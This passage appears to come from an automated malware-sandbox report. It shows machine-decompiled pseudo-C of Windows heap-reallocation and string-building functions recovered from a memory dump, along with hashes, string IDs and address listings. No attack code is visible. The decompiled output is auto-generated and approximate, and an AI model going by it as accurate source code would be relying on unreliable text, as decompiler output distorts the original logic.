                                                                                                                                                              • Opcode Fuzzy Hash: 827ba5bda769c7e88277e1f8b66bdbe928f8e6199aaf8984e7635eb016c47edc
                                                                                                                                                              • Instruction Fuzzy Hash: 51329C72800208EFDF21DFA8C895FEEBBB9BF88300F15442AF945A7261D7759A45DB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009F1238, Relevance: 10.3, Strings: 8, Instructions: 324COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                              			E009F1238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t123;
				signed int _t124;
				void* _t130;
				intOrPtr _t132;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				intOrPtr _t151;
				intOrPtr _t163;
				signed int _t173;
				signed int _t174;
				signed int _t178;
				short _t184;
				signed int _t193;
				signed int _t194;
				intOrPtr _t197;
				intOrPtr _t219;
				short* _t233;
				void* _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t246 = __edx;
				_push(0x18);
				_push(0x94d158);
				_t123 = E0094DF5C(__ebx, __edi, __esi);
				_t248 =  *((intOrPtr*)(_t255 + 8));
				 *((intOrPtr*)(_t255 + 8)) = _t248;
				 *((char*)(_t255 - 0x19)) = 0;
				 *(_t255 - 0x24) = 0;
				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
					 *(_t255 - 4) = 0;
					 *(_t255 - 4) = 1;
					_t232 = "RtlReAllocateHeap";
					_t124 = E009585CA(_t248, "RtlReAllocateHeap");
					__eflags = _t124;
					if(_t124 != 0) {
						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
						_t251 =  *(_t255 + 0x14);
						__eflags = _t251;
						if(_t251 == 0) {
							_t235 = 1;
							__eflags = 1;
						} else {
							_t235 = _t251;
						}
						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
						__eflags = _t130 - _t251;
						if(_t130 < _t251) {
							L66:
							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t132 + 0xc);
							if( *(_t132 + 0xc) == 0) {
								_push("HEAP: ");
								E0099373B();
							} else {
								E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_t248 + 0x7c)));
							E0099373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
							E009F06F9(0);
							_t117 = _t255 - 0x24;
							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
							__eflags =  *_t117;
							goto L71;
						} else {
							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
								goto L66;
							}
							__eflags =  *(_t255 + 0xc) & 0x00000001;
							if(__eflags == 0) {
								E009422D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
								 *((char*)(_t255 - 0x19)) = 1;
								_t26 = _t255 + 0xc;
								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
								__eflags =  *_t26;
							}
							E009F098E(_t235, _t246, _t248, 0);
							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
							__eflags =  *((char*)(_t253 + 7)) - 5;
							if( *((char*)(_t253 + 7)) == 5) {
								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
								__eflags = _t253;
							}
							_t145 = E00980ED7(_t235, _t248, _t253, _t232);
							__eflags = _t145;
							if(_t145 == 0) {
								L52:
								_t146 =  *(_t255 - 0x24);
								__eflags = _t146;
								if(_t146 == 0) {
									L71:
									_t119 = _t255 - 4;
									 *_t119 =  *(_t255 - 4) & 0x00000000;
									__eflags =  *_t119;
									 *(_t255 - 4) = 0xfffffffe;
									E009F16C3();
									_t123 =  *(_t255 - 0x24);
									goto L72;
								}
								__eflags = _t146 -  *0xa27928; // 0x0
								if(__eflags != 0) {
									_t147 = E00958131();
									__eflags = _t147 & 0x00000800;
									if((_t147 & 0x00000800) == 0) {
										goto L71;
									}
									__eflags =  *(_t255 - 0x20) -  *0xa2792c; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xa2792e; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t151 + 0xc);
									if( *(_t151 + 0xc) == 0) {
										_push("HEAP: ");
										E0099373B();
									} else {
										E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(E009DF719(_t248,  *(_t255 - 0x20)));
									_push( *(_t255 + 0x14));
									E0099373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
									L58:
									E009F06F9(0);
									goto L71;
								}
								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t163 + 0xc);
								if( *(_t163 + 0xc) == 0) {
									_push("HEAP: ");
									E0099373B();
								} else {
									E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t255 + 0x14));
								E0099373B("Just reallocated block at %p to %x bytes\n",  *0xa27928);
								goto L58;
							} else {
								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0xa27928; // 0x0
								if(__eflags != 0) {
									_t173 = E00958131();
									__eflags = _t173 & 0x00000800;
									if((_t173 & 0x00000800) == 0) {
										L37:
										_t174 = E0095C7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
										 *(_t255 - 0x24) = _t174;
										__eflags = _t174;
										if(_t174 != 0) {
											_t70 = _t174 - 8; // -8
											_t254 = _t70;
											__eflags =  *((char*)(_t254 + 7)) - 5;
											if( *((char*)(_t254 + 7)) == 5) {
												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
												__eflags = _t254;
											}
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
												if(__eflags != 0) {
													_push(0);
													_push(_t254);
													_push(_t248);
													E009EF8EE(_t232, _t248, _t254, __eflags);
												}
											}
											__eflags =  *(_t254 + 2) & 0x00000002;
											if(( *(_t254 + 2) & 0x00000002) == 0) {
												_t178 =  *(_t254 + 3) & 0xff;
											} else {
												_t233 = E00972568(_t254);
												__eflags =  *(_t248 + 0x40) & 0x08000000;
												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
													_t184 = 0;
													__eflags = 0;
												} else {
													_t184 = E009E9AF6();
												}
												 *_t233 = _t184;
												_t178 =  *(_t233 + 2) & 0x0000ffff;
											}
											 *(_t255 - 0x20) = _t178;
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												_t235 =  *(_t254 + 2) & 0x000000ff;
												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *_t254;
											}
										}
										E009EFB7A(_t235, _t246, _t248, 1);
										E009F098E(_t235, _t246, _t248, 0);
										goto L52;
									}
									_t232 = 0;
									__eflags =  *0xa2792c - _t232; // 0x0
									if(__eflags == 0) {
										goto L37;
									}
									__eflags =  *(_t248 + 0x4c);
									if( *(_t248 + 0x4c) != 0) {
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
										if(__eflags != 0) {
											_push(0);
											_push(_t253);
											_push(_t248);
											E009EF8EE(0, _t248, _t253, __eflags);
										}
									}
									__eflags =  *(_t253 + 2) & 0x00000002;
									if(( *(_t253 + 2) & 0x00000002) == 0) {
										_t193 =  *(_t253 + 3) & 0xff;
									} else {
										_t193 =  *(E00972568(_t253) + 2) & 0x0000ffff;
									}
									 *(_t255 - 0x20) = _t193;
									__eflags =  *(_t248 + 0x4c) - _t232;
									if( *(_t248 + 0x4c) != _t232) {
										_t235 =  *(_t253 + 2) & 0x000000ff;
										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *_t253;
									}
									_t194 =  *(_t255 - 0x20);
									__eflags = _t194 - _t232;
									if(_t194 != _t232) {
										__eflags = _t194 -  *0xa2792c; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xa2792e; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
											_push("HEAP: ");
											E0099373B();
										} else {
											E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_pop(_t235);
										_push(E009DF719(_t248,  *(_t255 - 0x20)));
										_push( *(_t255 + 0x14));
										E0099373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
										_t256 = _t256 + 0x10;
										_push(_t232);
										L36:
										E009F06F9();
									}
									goto L37;
								}
								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t219 + 0xc);
								if( *(_t219 + 0xc) == 0) {
									_push("HEAP: ");
									E0099373B();
								} else {
									E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_pop(_t235);
								_push( *(_t255 + 0x14));
								E0099373B("About to reallocate block at %p to %x bytes\n",  *0xa27928);
								_t256 = _t256 + 0xc;
								_push(0);
								goto L36;
							}
						}
					}
					 *(_t255 - 0x24) = 0;
					goto L71;
				} else {
					_push( *(_t255 + 0x14));
					_push( *((intOrPtr*)(_t255 + 0x10)));
					_push( *(_t255 + 0xc));
					_push(_t248);
					E009EE765();
					L72:
					return E0094DFA1(_t123);
				}
			}




























                                                                                                                                                              0x009f1238
                                                                                                                                                              0x009f1238
                                                                                                                                                              0x009f123a
                                                                                                                                                              0x009f123f
                                                                                                                                                              0x009f1244
                                                                                                                                                              0x009f1247
                                                                                                                                                              0x009f124a
                                                                                                                                                              0x009f1250
                                                                                                                                                              0x009f125a
                                                                                                                                                              0x009f1270
                                                                                                                                                              0x009f1273
                                                                                                                                                              0x009f127a
                                                                                                                                                              0x009f1281
                                                                                                                                                              0x009f1286
                                                                                                                                                              0x009f1288
                                                                                                                                                              0x009f129a
                                                                                                                                                              0x009f129d
                                                                                                                                                              0x009f12a0
                                                                                                                                                              0x009f12a2
                                                                                                                                                              0x009f12aa
                                                                                                                                                              0x009f12aa
                                                                                                                                                              0x009f12a4
                                                                                                                                                              0x009f12a4
                                                                                                                                                              0x009f12a4
                                                                                                                                                              0x009f12b9
                                                                                                                                                              0x009f12bc
                                                                                                                                                              0x009f12be
                                                                                                                                                              0x009f1616
                                                                                                                                                              0x009f161c
                                                                                                                                                              0x009f161f
                                                                                                                                                              0x009f1623
                                                                                                                                                              0x009f1645
                                                                                                                                                              0x009f164a
                                                                                                                                                              0x009f1625
                                                                                                                                                              0x009f163d
                                                                                                                                                              0x009f1642
                                                                                                                                                              0x009f1650
                                                                                                                                                              0x009f1659
                                                                                                                                                              0x009f1663
                                                                                                                                                              0x009f169f
                                                                                                                                                              0x009f169f
                                                                                                                                                              0x009f169f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f12c4
                                                                                                                                                              0x009f12c4
                                                                                                                                                              0x009f12c7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f12cd
                                                                                                                                                              0x009f12d1
                                                                                                                                                              0x009f12d9
                                                                                                                                                              0x009f12de
                                                                                                                                                              0x009f12e2
                                                                                                                                                              0x009f12e2
                                                                                                                                                              0x009f12e2
                                                                                                                                                              0x009f12e2
                                                                                                                                                              0x009f12e9
                                                                                                                                                              0x009f12f1
                                                                                                                                                              0x009f12f4
                                                                                                                                                              0x009f12f8
                                                                                                                                                              0x009f1301
                                                                                                                                                              0x009f1301
                                                                                                                                                              0x009f1301
                                                                                                                                                              0x009f1306
                                                                                                                                                              0x009f130b
                                                                                                                                                              0x009f130d
                                                                                                                                                              0x009f1516
                                                                                                                                                              0x009f1516
                                                                                                                                                              0x009f1519
                                                                                                                                                              0x009f151b
                                                                                                                                                              0x009f16a3
                                                                                                                                                              0x009f16a3
                                                                                                                                                              0x009f16a3
                                                                                                                                                              0x009f16a3
                                                                                                                                                              0x009f16a7
                                                                                                                                                              0x009f16ae
                                                                                                                                                              0x009f16b3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f16b3
                                                                                                                                                              0x009f1521
                                                                                                                                                              0x009f1527
                                                                                                                                                              0x009f1585
                                                                                                                                                              0x009f158a
                                                                                                                                                              0x009f158f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f1599
                                                                                                                                                              0x009f15a0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f15ad
                                                                                                                                                              0x009f15b4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f15c0
                                                                                                                                                              0x009f15c3
                                                                                                                                                              0x009f15c7
                                                                                                                                                              0x009f15e9
                                                                                                                                                              0x009f15ee
                                                                                                                                                              0x009f15c9
                                                                                                                                                              0x009f15e1
                                                                                                                                                              0x009f15e6
                                                                                                                                                              0x009f15fd
                                                                                                                                                              0x009f15fe
                                                                                                                                                              0x009f1609
                                                                                                                                                              0x009f1579
                                                                                                                                                              0x009f157b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f157b
                                                                                                                                                              0x009f152f
                                                                                                                                                              0x009f1532
                                                                                                                                                              0x009f1536
                                                                                                                                                              0x009f1558
                                                                                                                                                              0x009f155d
                                                                                                                                                              0x009f1538
                                                                                                                                                              0x009f1550
                                                                                                                                                              0x009f1555
                                                                                                                                                              0x009f1563
                                                                                                                                                              0x009f1571
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f1313
                                                                                                                                                              0x009f1316
                                                                                                                                                              0x009f131c
                                                                                                                                                              0x009f1375
                                                                                                                                                              0x009f137a
                                                                                                                                                              0x009f137f
                                                                                                                                                              0x009f1468
                                                                                                                                                              0x009f1472
                                                                                                                                                              0x009f1477
                                                                                                                                                              0x009f147a
                                                                                                                                                              0x009f147c
                                                                                                                                                              0x009f1482
                                                                                                                                                              0x009f1482
                                                                                                                                                              0x009f1485
                                                                                                                                                              0x009f1489
                                                                                                                                                              0x009f1492
                                                                                                                                                              0x009f1492
                                                                                                                                                              0x009f1492
                                                                                                                                                              0x009f1494
                                                                                                                                                              0x009f1498
                                                                                                                                                              0x009f149d
                                                                                                                                                              0x009f14a7
                                                                                                                                                              0x009f14aa
                                                                                                                                                              0x009f14ac
                                                                                                                                                              0x009f14ae
                                                                                                                                                              0x009f14af
                                                                                                                                                              0x009f14b0
                                                                                                                                                              0x009f14b0
                                                                                                                                                              0x009f14aa
                                                                                                                                                              0x009f14b5
                                                                                                                                                              0x009f14b9
                                                                                                                                                              0x009f14e3
                                                                                                                                                              0x009f14bb
                                                                                                                                                              0x009f14c1
                                                                                                                                                              0x009f14c3
                                                                                                                                                              0x009f14ca
                                                                                                                                                              0x009f14d3
                                                                                                                                                              0x009f14d3
                                                                                                                                                              0x009f14cc
                                                                                                                                                              0x009f14cc
                                                                                                                                                              0x009f14cc
                                                                                                                                                              0x009f14d5
                                                                                                                                                              0x009f14d8
                                                                                                                                                              0x009f14d8
                                                                                                                                                              0x009f14e6
                                                                                                                                                              0x009f14e9
                                                                                                                                                              0x009f14ed
                                                                                                                                                              0x009f14f8
                                                                                                                                                              0x009f14fe
                                                                                                                                                              0x009f1504
                                                                                                                                                              0x009f1504
                                                                                                                                                              0x009f1504
                                                                                                                                                              0x009f14ed
                                                                                                                                                              0x009f1509
                                                                                                                                                              0x009f1511
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f1511
                                                                                                                                                              0x009f1385
                                                                                                                                                              0x009f1387
                                                                                                                                                              0x009f138d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f1393
                                                                                                                                                              0x009f1396
                                                                                                                                                              0x009f139b
                                                                                                                                                              0x009f13a5
                                                                                                                                                              0x009f13a8
                                                                                                                                                              0x009f13aa
                                                                                                                                                              0x009f13ab
                                                                                                                                                              0x009f13ac
                                                                                                                                                              0x009f13ad
                                                                                                                                                              0x009f13ad
                                                                                                                                                              0x009f13a8
                                                                                                                                                              0x009f13b2
                                                                                                                                                              0x009f13b6
                                                                                                                                                              0x009f13c9
                                                                                                                                                              0x009f13b8
                                                                                                                                                              0x009f13be
                                                                                                                                                              0x009f13be
                                                                                                                                                              0x009f13cc
                                                                                                                                                              0x009f13cf
                                                                                                                                                              0x009f13d2
                                                                                                                                                              0x009f13dd
                                                                                                                                                              0x009f13e3
                                                                                                                                                              0x009f13e9
                                                                                                                                                              0x009f13e9
                                                                                                                                                              0x009f13e9
                                                                                                                                                              0x009f13eb
                                                                                                                                                              0x009f13ee
                                                                                                                                                              0x009f13f1
                                                                                                                                                              0x009f13f3
                                                                                                                                                              0x009f13fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f1403
                                                                                                                                                              0x009f140a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f1412
                                                                                                                                                              0x009f1415
                                                                                                                                                              0x009f1418
                                                                                                                                                              0x009f143a
                                                                                                                                                              0x009f143f
                                                                                                                                                              0x009f141a
                                                                                                                                                              0x009f1432
                                                                                                                                                              0x009f1437
                                                                                                                                                              0x009f1444
                                                                                                                                                              0x009f144e
                                                                                                                                                              0x009f144f
                                                                                                                                                              0x009f145a
                                                                                                                                                              0x009f145f
                                                                                                                                                              0x009f1462
                                                                                                                                                              0x009f1463
                                                                                                                                                              0x009f1463
                                                                                                                                                              0x009f1463
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f13f1
                                                                                                                                                              0x009f1324
                                                                                                                                                              0x009f1327
                                                                                                                                                              0x009f132b
                                                                                                                                                              0x009f134d
                                                                                                                                                              0x009f1352
                                                                                                                                                              0x009f132d
                                                                                                                                                              0x009f1345
                                                                                                                                                              0x009f134a
                                                                                                                                                              0x009f1357
                                                                                                                                                              0x009f1358
                                                                                                                                                              0x009f1366
                                                                                                                                                              0x009f136b
                                                                                                                                                              0x009f136e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f136e
                                                                                                                                                              0x009f130d
                                                                                                                                                              0x009f12be
                                                                                                                                                              0x009f128a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f125c
                                                                                                                                                              0x009f125c
                                                                                                                                                              0x009f125f
                                                                                                                                                              0x009f1262
                                                                                                                                                              0x009f1265
                                                                                                                                                              0x009f1266
                                                                                                                                                              0x009f16b6
                                                                                                                                                              0x009f16bb
                                                                                                                                                              0x009f16bb

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                              • API String ID: 0-3744532478
                                                                                                                                                              • Opcode ID: c6b7544c7a3e0328e7b4c3ddc10f97038b9af1e686665855a803ee95a8f6adb9
                                                                                                                                                              • Instruction ID: 6f3ec05c7602d20d6c54dddbe89dc59ddec446e8e69a8537006378149ba266e9
                                                                                                                                                              • Opcode Fuzzy Hash: c6b7544c7a3e0328e7b4c3ddc10f97038b9af1e686665855a803ee95a8f6adb9
                                                                                                                                                              • Instruction Fuzzy Hash: 66C1E171500289DFDB21EFA8C846FBAB7F4BF88714F048448F9959A692C734ED45DBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0094F3CF, Relevance: 9.2, Strings: 7, Instructions: 466COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E0094F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
				signed int _v8;
				short _v12;
				short _v24;
				intOrPtr _v28;
				short* _v32;
				short* _v36;
				short* _v40;
				short _v42;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed short _v56;
				signed int _v60;
				signed short _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed char* _v84;
				signed int _v88;
				char _v92;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t186;
				short _t194;
				short* _t196;
				intOrPtr _t205;
				signed char* _t206;
				signed char _t207;
				signed int _t209;
				signed short* _t210;
				void* _t214;
				signed int _t215;
				signed int _t219;
				void* _t221;
				signed int _t223;
				signed short _t227;
				signed char _t232;
				void* _t237;
				signed int _t238;
				signed short _t242;
				signed int _t245;
				signed int _t254;
				void* _t255;
				signed int _t256;
				signed short _t260;
				void* _t266;
				signed int _t267;
				signed int _t271;
				signed short* _t282;
				signed int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int _t299;
				signed int* _t300;
				signed short _t304;
				char* _t337;
				signed int* _t342;
				signed int _t345;
				signed short* _t347;
				signed int _t348;
				void* _t349;
				void* _t350;

				_t347 = __esi;
				_t186 =  *0xa22088; // 0x7741ce3b
				_v8 = _t186 ^ _t348;
				_v88 = _a8;
				_t345 = __edx;
				_t282 = __ecx;
				_v56 = __edx;
				_v156 = 0x40;
				E0094DFC0( &_v152, 0, 0x3c);
				_t350 = _t349 + 0xc;
				_v68 =  *_t282;
				_v64 = _t282[2];
				_t337 =  &_v12;
				_v32 = _t337;
				_v40 = _t337;
				_v36 =  &_v12;
				_t194 = 2;
				_v12 = 0;
				_v44 = 0;
				_v42 = _t194;
				_t341 =  &_v68;
				_v72 = 0;
				_v60 = 0;
				_v28 = _t194;
				_v24 = _t194;
				_t283 = E0094ED18(3, 0, _t194,  &_v68,  &_v156);
				if(_t283 >= 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						L44:
						_t283 = 0;
						L2:
						_t291 = _v36;
						_t196 = _v32;
						if(_t291 != 0) {
							if(_t291 != _t196) {
								_v88 = _t291;
								E0094E1C6( &_v92);
								_t196 = _v32;
							}
							_v36 = _t196;
							_v28 = _v24;
						}
						_v40 = _t196;
						if(_t196 != 0) {
							 *_t196 = 0;
						}
						_v44 = 0;
						_t198 = _v24;
						_v42 = _v24;
						if(_v72 != 0) {
							E0095B90D(_t198, _v72);
						}
						return E0094E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
					}
					__eflags = _v144 - 0x14;
					_v72 = _v124;
					if(_v144 < 0x14) {
						L48:
						_t283 = 0xc0150003;
						goto L2;
					}
					__eflags = _v152 - 1;
					if(_v152 != 1) {
						goto L48;
					}
					_t205 = _v148;
					_t296 = _t205 + 0x10;
					_v52 = _t296;
					_t297 =  *_t296;
					__eflags = _t297 - _v128;
					if(_t297 > _v128) {
						goto L48;
					}
					_t342 = _t205 + 0xc;
					_v76 = _t342;
					_t341 =  *_t342;
					__eflags = _t341 - 0x1fffffff;
					if(_t341 > 0x1fffffff) {
						goto L48;
					}
					_t341 = _t341 << 3;
					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
					if(_t297 > (_t283 | 0xffffffff) - _t341) {
						goto L48;
					}
					_t341 = _t341 + _t297;
					__eflags = _t341 - _v128;
					if(_t341 > _v128) {
						goto L48;
					}
					_t206 = _t205 + 4;
					_v84 = _t206;
					_t207 =  *_t206;
					__eflags = _t207 & 0x00000002;
					if((_t207 & 0x00000002) == 0) {
						L22:
						_t287 =  *_v52 + _v132;
						_t209 = 0;
						 *_t345 = 0;
						_t299 =  *_v76;
						_v52 = _t299;
						__eflags = _t299;
						while(1) {
							_v48 = _t209;
							if(__eflags == 0) {
								break;
							}
							_t300 = _t287 + 4 + _t209 * 8;
							_t341 =  *_t300;
							_v76 = _t341;
							__eflags = _t341 - _v128;
							if(_t341 > _v128) {
								goto L48;
							}
							_t210 = _t287 + _t209 * 8;
							_t341 = (_t341 | 0xffffffff) -  *_t210;
							__eflags =  *_t300 - _t341;
							if( *_t300 > _t341) {
								goto L48;
							}
							__eflags =  *_t210 + _v76 - _v128;
							if( *_t210 + _v76 > _v128) {
								goto L48;
							}
							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
							_t209 = _v48 + 1;
							__eflags = _t209 - _v52;
						}
						_t303 = _v60;
						__eflags = _t303;
						if(_t303 != 0) {
							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
							__eflags =  *_t345;
						}
						_t214 = ( *_t345 & 0x0000ffff) + 2;
						__eflags = _t214 - 0xfffe;
						if(_t214 > 0xfffe) {
							L76:
							_t283 = 0xc0000106;
							goto L2;
						} else {
							_t345 =  &(_t347[4]);
							__eflags = _t345;
							if(_t345 == 0) {
								L60:
								_t215 = E009778E5(0, _t345, _t214);
								__eflags = _t215;
								if(_t215 >= 0) {
									_t303 = _v60;
									L29:
									_t347[2] =  *_t345;
									_t347[1] = _t347[8];
									__eflags = _t303;
									if(_t303 == 0) {
										L34:
										_v48 = _v48 & 0x00000000;
										__eflags = _v52;
										if(_v52 != 0) {
											while(1) {
												_t219 = _v48 << 3;
												_t304 =  *((intOrPtr*)(_t219 + _t287));
												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
												_v80 = _t304;
												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
												__eflags = _t221 - 0xfffe;
												if(_t221 > 0xfffe) {
													goto L76;
												}
												__eflags =  &(_t347[4]);
												if( &(_t347[4]) == 0) {
													L68:
													_t223 = E009778E5(0,  &(_t347[4]), _t221);
													__eflags = _t223;
													if(_t223 < 0) {
														goto L61;
													}
													L69:
													_t347[2] = _t347[4];
													E00958980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
													_t227 = _v80;
													 *_t347 =  *_t347 + _t227;
													_t347[1] =  *_t347 + _t227 + 2;
													_t303 = _t347[2];
													_t341 = 0;
													_t350 = _t350 + 0xc;
													_v48 = _v48 + 1;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													__eflags = _v48 - _v52;
													if(_v48 == _v52) {
														goto L35;
													}
													continue;
												}
												__eflags = _t221 - _t347[8];
												if(_t221 <= _t347[8]) {
													goto L69;
												}
												goto L68;
											}
											goto L76;
										}
										L35:
										_t232 =  *_v84;
										_t345 = _v56;
										__eflags = _t232 & 0x00000001;
										if((_t232 & 0x00000001) != 0) {
											L42:
											__eflags =  *_v84 & 0x00000004;
											if(__eflags != 0) {
												_push(0);
												_t341 = _t347;
												_t283 = E009CC0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
												__eflags = _t283;
												if(_t283 < 0) {
													goto L2;
												}
												 *_t347 = 0;
												_t237 = (_v44 & 0x0000ffff) + 2;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													goto L76;
												}
												_t288 =  &(_t347[4]);
												__eflags = _t288;
												if(_t288 == 0) {
													L83:
													_t238 = E009778E5(0, _t288, _t237);
													__eflags = _t238;
													if(_t238 < 0) {
														goto L61;
													}
													L84:
													_t347[2] =  *_t288;
